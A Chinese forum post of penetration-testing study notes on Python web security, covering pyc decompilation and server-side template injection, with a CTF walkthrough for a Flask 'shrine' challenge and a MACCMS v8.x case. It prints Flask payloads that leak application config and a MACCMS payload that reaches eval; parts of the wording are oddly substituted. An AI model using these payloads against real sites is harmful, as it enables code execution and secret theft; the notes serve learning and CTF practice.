渗透学习-23- WEB 攻防-Python 考点&CTF 与 CMS-SSTI 模版注入&P ...

守听  论坛元老 | 2025-3-4 21:11:06 | 显示全部楼层 | 阅读模式
打印 上一主题 下一主题
楼主

主题 2127|帖子 2127|积分 6381

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有账号?立即注册

x
pyc 文件是 py 文件编译后天生的字节码文件(byte code),pyc 文件颠末 python 解释器最终会天生机
器码运行。因此 pyc 文件是可以跨平台摆设的,类似 Java 的.class 文件,一般 py 文件改变后,都会
重新天生 pyc 文件。
真题附件:http://pan.baidu.com/s/1jGpB8DS
反编译平台:
https://tool.lu/pyc/
http://tools.bugscaner.com/decompyle/
反编译工具:https://github.com/wibiti/uncompyle2
#SSTI 入门-原理&分类&检测&分析&利用
1、什么是 SSTI?有什么毛病危害?

一般都是代码审计发现,黑盒很难,,, 现在用处不大,暂时可忽略。。
毛病成因就是服务端接收了用户的恶意输入以后,未经任那边理就将其作为 Web 应用模板内容的
一部分,模板引擎在进行目的编译渲染的过程中,实行了用户插入的可以粉碎模板的语句,因而可
能导致了敏感信息泄露、代码实行、GetShell 等题目。其影响范围主要取决于模版引擎的复杂性。
模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以天生特定格式的文档,利用模板引擎来天生前端的html代码,模板引擎会提供一套天生html代码的步伐,然后只需要获取用户的数据,然后放到渲染函数里,然后天生模板+用户数据的前端html页面,然后反馈给欣赏器,出现在用户面前。
举个例子,我想买裙子,这时候我会打开某宝,直接在搜索框输入“裙子”,就会出现跟裙子相干的一系列商品,各种颜色,各种样式。那我们来想一下,这么多商品的各种信息是直接全部写死在页面上的嘛?那我们每次查找的商品都不一样,需要的内存就太大了
很显然,并不是,所以这里就表现了我们模板引擎的作用,它可以根据从数据库中及时提取出来的数据对html页面及时的渲染,这,就是模板引擎。
毛病成因就是服务端接收了用户的恶意输入以后,未经任那边理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目的编译渲染的过程中,实行了用户插入的可以粉碎模板的语句,因而大概导致了敏感信息泄露、代码实行、GetShell 等题目。其影响范围主要取决于模版引擎的复杂性。
2、如何判定检测 SSTI 毛病的存在?

-输入的数据会被欣赏器利用当前脚本语言调用剖析实行
用户输入的东西一定要被实行
3、SSTI 会产生在那些语言开发应用?

-见上图
4、SSTI 安全题目在生产情况那边产生?

-存在模版引用的地方,如 404 错误页面展示
-存在数据接收引用的地方,如模版剖析获取参数数据
有接收数据并实行渲染的地方。 好比 xxx.com/x.php?404_url=54 这个54假如被实行,来渲染新的页面, 新的页面显示的是5*4被实行后的效果。。
  1. <div class="style">
  2. <h1> 这里是样式模板</h1>
  3. <title> 这里是从数据库里面去取标题 </title>
  4. </div>
复制代码
模板样式可以换来换去,每次都是去数据库内里取标题、文章等等进行加载
#SSTI 考点-CTF 靶场-[WesternCTF]shrine
1、源码分析 SSTI 考点
2、测试判定 SSTI 存在
3、分析代码过滤和 FLAG 存储
4、利用 Flask 两个函数利用获取
https://blog.csdn.net/houyanhua1/article/details/85470175
url_for()函数是用于构建操作指定函数的 URL
get_flashed_messages()函数是获取通报过来的数据
/shrine/{{url_for.globals}}
/shrine/{{url_for.globals[‘current_app’].config}}
/shrine/{{get_flashed_messages.globals}}
/shrine/{{get_flashed_messages.globals[‘current_app’].config}}
#SSTI 考点-CMS 源码-MACCMS_V8.X 实行
Payload:index.php?m=vod-search&wd={if-dddd:phpinfo()}{endif-dddd}
1、根据 wd 通报的代码找指向文件
2、index->vod->tpl->ifex->eval

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
回复

使用道具 举报

0 个回复

倒序浏览
返回列表

快速回复

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

守听

论坛元老
这个人很懒什么都没写!

楼主热帖

标签云

渠道 国产数据库 集成商 AI 运维 CIO 存储 服务器
微信订阅号
微信服务号
微信客服
小程序
H5
关于我们 商务合作 网站地图
©Copyright 2022-2024 杭州祥升科技有限公司 版权所有 浙ICP备20004199号
快速回复 返回顶部 返回列表